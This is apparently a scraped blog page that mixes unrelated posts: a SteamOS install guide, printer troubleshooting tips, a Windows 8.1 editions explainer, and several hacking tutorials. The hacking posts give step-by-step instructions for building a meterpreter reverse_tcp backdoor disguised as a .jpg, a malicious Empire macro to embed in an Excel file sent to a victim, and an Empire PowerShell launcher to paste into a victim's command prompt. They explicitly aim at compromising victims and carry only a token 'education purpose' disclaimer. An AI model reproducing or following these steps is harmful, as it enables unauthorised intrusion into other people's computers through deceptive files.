How to Install SteamOS To Your Computer



These Steam OS are made by Valve. A company that distributes for a paid and free Game Online. For favorite free games from Valve that I like is Dota 2. Until now I still play this game. This Distro is designed specifically for a gaming. Playable games are available in the Steam Store.
Steam OS is equipped with linux kernel tweak. An Addition to ensuring that someone is better at gaming performance with other Distros.


And in this tutorial I will explain How to install Linux Steam OS on your computer.

Let's get started






  • Connect your USB drive to your computer.
  • Format it.
  • If you use windows. right-Click the drive, select format, and choose FAT32.
  • For OS X, enter the Utilities folder in your Application List, click Disk Utilitiy, select Erase, and choose MS-DOS (Fat).
  • Rename the USB Drive to "SYSRESTORE".




  • If download has finish. Extrack all files to USB drive.




  • Turn Off your computer. 
  • Select Boot to USB Drive.
  • Selection you are looking for will read something along the lines of "UEFI: USB Brand Name PMAP".

  • Next, select the "Restore Entire Disk".



  • After Installation is complete, press Enter to shut down the machine.

  • Remove the USB Drive from your computer. and you should now be running SteamOS.


Custom Installation.

First Method usually some people have some problem from installation. So maybe you can try to Custom Installation like Below.


  • Download the Custom Install SteamOS file from Valve's Web Site.
  • Connect Your USB Drive to Computer.
  • Windows Format It to Fat32.
  • OS X format to MS-DOS(FAT)
  • After Download has finish, Unzip the File, and extract all content to root of your flash Drive
  • Shut Down computer and boot to USB Driver
  • Select the "Automated Install". This method will erase your entire hard driver.


  • Process Installation



  • After Complete. Remove USB Drive.  And your system will be reboot.
  • Select partition that reads. "SteamOS GNU/Linux, weith Linux 3.10-3-amd64".



  • Change to GNOME option and enter Steam for username and password.
  • Click on the Activities button in the top left corner of the screen, select the Applications tab, open Terminal Application, type in "steam", press enter, and accept the terms of use agreement.



  • Click on steam button in the top right corner of the screen and log out of your session.
  • log back to GNOME desktop,  with username and password.
  • Type "./post_logon.sh" in terminal. enter the password.
  • dont panic if the numbers dont appear when your type them out, just type "desktop" and press enter.



  • The system will now reboot.
  • Now SteamOS is Running on your Computer.



Related Posts:

How A VIRUS (Backdoor) Is Hiding In JPG File.


In My tutorial now is about How to create a virus that is inputted to a extension file .rar and .jpg  (image format). This method is very helpful for a hacker who wants to gain access to the target using an incognito file. So the backdoor that we created using netool will hide in the jpg file. When a target opens the file in windows 7.8, or 10 then the attacker will begin to have full access to the target.

We can download Netool in Here

Ok we start to the tutorial.
  • Open Netool in Kali Linux.


  • Pick number 8 for Rootsector Exploits


  • Set Interface in Use
  • Im using Wlan0


  • Next Pick number 17 ( Winrar backdoor)
  • Press Enter


  • Set Your IP Address
  • Click OK


  • Input File name
  • For Zip extension
  • Click Ok


  • Set Input Spoof File
  • Set extension .jpg
  • Click Ok


  • Msfconsole will Launch
  • And you can see Location for file backdoor


  • Type show options
  • set FILENAME sexy.zip
  • set LPORT 4452

  • Next, Type exploit
  • And you can see location a backdoor


  • Type "set payload windows/meterpreter/reverse_tcp"


  • Set LHOST "Your Ip Address"
  • Set Port 4452


  • Type exploit
  • for Start Exploitation


  • In Windows Victim.
  • You must your brain how the victim will open a file (Backdoor)


  • Then, if the victim Open a backdoor
  • You have access the computer victim.
  • Success!!!


Now you are a hacker.
But remember,. This method only for EDUCATION PURPOSE.!!
If something happens to you using this method, I am not responsible
Happy Learning Guys (y)
For Tutorial Version Video. Check Below!...
Thnks..

Related Posts:

How To Create Macro for Remote Windows OS


Macros in this method is a Backdoor Created by Hackers, backdoor created using empire with linux os. In this case the macro will be injeck to microsoft word or microsoft excell. After the macro is inject into microsoft word or excell, send the excell file / word to victim. And if victim opens the file. then the session meterpreter will open.

Ok we start with Tutorial.
Kita Need install empire to Linux OS.
Tutorial for Install Empire you can see in Here

Let's Start

  • Open Empire.


  • Create Listener.
  • Type listeners


  • Type Info for see Properties a Empire Listeners
  • Set name "Name What you Want"
  • Set Host " this automatic "

  • Tyepe Execute 
  • For generate a listeners
  • type list
  • for see listeners


  • Start create a macro.
  • type usestager macro "listeners"


  • Type info
  • for see macro properties


  • Type Execute 
  • for generate a macro
  • and you can see Location a macro in /tmp/macro
  • check to directory


  • Copy a script macro, and
  • Open microsoft excell,
  • To menu View > macro
  • Create macro


  • Paste in here.
  • And you can save this file.


  • Send file excell to victim.
  • And if victim open file excell in windows 7, windows 8 or Windows 10,
  • Then Initial Agents will be active


  • Ok. Success.
  • You can access the victim OS from your Linux.


This method only for Education Purpose.
Ok. Happy Learning..
Ty

Wait. wait. for Tutorial Version Video.
You can see in Below.
Thanks Agains

Related Posts:

12 Problems on Printer, and How to Solved



12 Problems on Printer, and How to Solved??

A printer is a tool used to print documents or photos. Using input from computer or mobile phone and print media is paper. By using the printer we can print a document, photos from small to large size. This discussion is about inkjet printers. A printer that prints by sprinkling the ink that catridge comes to a paper. This time I will share about the problems that often happen to inkjet printer. For First Problem  is a blockage in the head Printer. In addition there are many problems that often occur in inkjet printers.
  • 1. Print error / print off.

When your print can not print. first, Check  printer,  check the power supplied to printer. Also Check the connecting cable from the mains to the printer.

Solution : replace the printer power cable.
  • 2. The printer is not connected to the computer

This is caused by the USB cable connecting the printer to the computer. The cause of damaged USB cable is the printer is not detected by the computer (offline).

Solution : is to replace the cable. If you want to Check cable USB, you can use multimeter / Avometer to check USB cable damage.

  • 3. Printer Driver Error

This data problem causes the process of sending data from computer to printer, Until the data make break connection.

Solution: Uninstall Driver, and install again the printer driver.

  • 4. Ink runs out

If the printer ink is depleted, the printer can not print the document. Print remains alive but can not release printing. Do not use printer if the ink runs out, because it will damage the head on the catridge.

Solution: Refill Ink using injecting.

  • 5. Catridge is not installed properly

What will happen is the printer will be stuck and will not work normally.

Solution: Open Printer cover, remove catridge and Plug in it again. Make sure the catridge position is correct.

  • 6. Dirty cartridge

The cause of this problem is the printer will be dashed.

Solution : do head cleaning. Use the maintenance application, and select the cleaning head. And check back the printer. If maslaah has not been resolved use a tissue to clean the printer head. Use soft tissue and do it slowly.

  • 7. Dry ink.

The cause of dry ink is because the printer has long been unused. So the printer stalled / failed to print.

Solution : solution is to do deep cleaning. Use the maintenance application and select deep cleaning. If not solved, use warm water to soak the catridge head. Soak for 1 minute. Then dry, and insert the catridge into the printer again. If still not resolved then you can replace with the new catridge.

  • 8. Catrige is broken

The broken cartridge marked with catridge is not detected by the printer. Or if the above problem is not resolved then the solution is to replace the catridge.

  • 9. Printer absorber.

The printer has a printing limit, when it has exceeded the limit. Then the priter must be reset. The printer will not be in use / freeze.

Solution: Reset Printer using software.

  • 10. Paper Jam

Paper Jam is the existence of paper / other objects that clog in the printer. So the printer stalls.

Solution: Turn off the printer, open the Cover Printer, if it finds the paper / objects are caught, immediately take. And re-plug the printer cover. Test the printer again to make sure the printer has been resolved.

  • 11. Paper is too much

Did you know if the printer has a maximum paper limit. On this problem the printer will get stuck or error. So the printer is not working. Do not input paper too much into the printer. So that the printer is not easily damaged.

Solution : use paper thinner. Use enough space for a paper towing roll to pull paper while the printer is operating.

  • 12. Roll of paper towel is damaged.

On this problem the printer will be error and jammed. The cause is a paper crusher roll break, or there is an item that makes the roll not function.

Solution: open the printer cover, check Roll the paper, if the roll is broken you can replace the roll. And if there are other problems you can bring to the service center printer.

To this last problem you can analyze your printer's damage. But keep in mind, if the problem is too heavy you can bring the unit to the Service Center Printer in Your Area.

Thanks !!

Related Posts:

How to Install Metasploit on Android.


Hello guys. For New tutorial. I will learn about how we can install Metasploit on Your Android. Do you know what can we do with metasploit?

Metasploit is an application that you can use to exploitation a system, you know about a Concept there is "No System Is Safe"? a slogan in the movie "Who Am I". Metasploit is the answer.

Metasploit can be used for Hacking and IT security. Can be used for begineer and professional.
The definition of Metasploit is as a Framework for Cyber Exploitation. Metasploit will develop a Meterpreter when the target Opens a backdoor created in Metasploit. That can Open Access to a system.

Metasploit can be installed on Windows and Linux OS. And what if you do not have a Laptop device.? You can install Wetasploit on your android.
And now I will teach you how to install metasploit on your android.

First you can install Termux, download termux in google play store.
Next. Install metasploit in termux





  • Gem nokogiri not yet installed


  • $ bundle config build.nokogiri –use-system-libraries
  • $ bundle install     — ( Wait 2 – 3 Mins )
  • $ ./msfconsole



  • Done
And You can Exploitation The Any System in The World WIth Your Android. Remember, use wisely your abilities
Thanks. 

Related Posts:

Do you know the difference WIndows 8.1 Version N, VL, an WMC ???



Everyone knows about Windows. Lately the Windows release  Produc Version 8.1 N, VL and WMC. Do you know the difference between it?

I will discuss the three differences. If previously there are Windows 8 professional, SL, enterprise and RT. But in Windows 8.1 there are different versions.

Ok we discuss from the first .

N. N is a type of Windows 8.1 which does not have Windows Media Player (WMP), so you have to Install the Audio and Video Player first. I do not think it's a big deal. Because VLC (Video Lan Codec)  or SPlayer already has its own Audio and Video. So you just need to download and install VLC or SPlayer.

VL. Vl has a meaning (Volume License) is a type of Windows that has many activation. This means it can be activated repeatedly without any limit. Windows VL is typically used by Companies that purchase Windows license 8.1 on a wholesale basis for employee use. VL is commonly used in Windows 8.1 Enterprise and sometimes inWwindows 8 Professional.

WMC. WMC has meaning (Windows Media Center) is kind of windows with focus in Multimedia Entertainment System. We can record broadcast television playing all the audio and video deposits from the media player.

The new findings in  have the KN Code. Namely Windows 8 which is dedicated to South Korea without WMP. From the search results information about the code and versions behind Windows 8 turned out to have meaning for the regional area. And all have limited features. subject to formal instructions by the request of Each State.
Another example is the European Union which does not include windows media player in Windows 8 to prevent Software Monopoly. And finally created windows 8 N.

If you are interested to install one of the three versions of windows 8.1. You can visit the official website from Microsoft. You can download the existing .iso and you can select the appropriate version of your country

For me it is the right of each country. If you are in Europe then you have to follow the rules. 
Thanks.

Related Posts:

How to Powershell Empire to Start Exploitation Windows OS

Powershell in empire is Amazing framework that is very much used by penetration testers to try to exploit the host microsoft windows in the world. in our guide now is to discuss about how it can happen. using the powershell method created by the empire tool. general info from empire is about listener, stagers, agent and powershell module.

we will try this empire to exploit windows os. this tool is very easy to use. to get meterpreter session we only need windows user access powershell that we make in empire.

  • the listener is a functioning channel for the recipient of the target windows.
  • stagers is to set backdoor what we will choose.
  • agent is the result of exploit that we have created.
  • modules in powershell are used to perform certain functions, such as using a special shellcode
Tutorial Install Empire in Here

Start to Learn.

Open Empire
Type listeners for Create listener

Set names (name for listeners)
Set Host (http://"ip address Linux":"port for random choice" you can pick 8080

Execute

List for see listeners we have create

usestager launcher "name listener"

execute

Copy and paste in windows os. open cmd in windows, and paste . press enter.

Agent is coming
type agents

interact "name agent"

Good job. you got the system windows.


Tutorial Version Video


Related Posts: